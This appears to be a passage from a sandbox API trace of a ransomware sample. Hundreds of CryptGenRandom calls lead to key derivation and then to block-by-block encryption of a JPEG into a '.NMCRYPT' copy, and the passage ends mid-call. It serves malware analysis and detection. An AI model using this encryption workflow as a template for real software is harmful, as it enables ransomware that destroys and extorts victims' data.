[0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.696] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.697] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.697] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0165.697] CryptHashData (hHash=0x9ad338, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.697] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad138) returned 1 [0165.697] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.697] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.697] wcslen (_String="\\\\?\\") returned 0x4 [0165.697] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad678) returned 1 [0165.697] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.698] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=1990) returned 1 [0165.699] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.699] GetLastError () returned 0x0 [0165.699] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.776] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.776] GetLastError () returned 0x0 [0165.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.776] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.776] GetLastError () returned 0x0 [0165.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.776] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.776] GetLastError () returned 0x0 [0165.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, 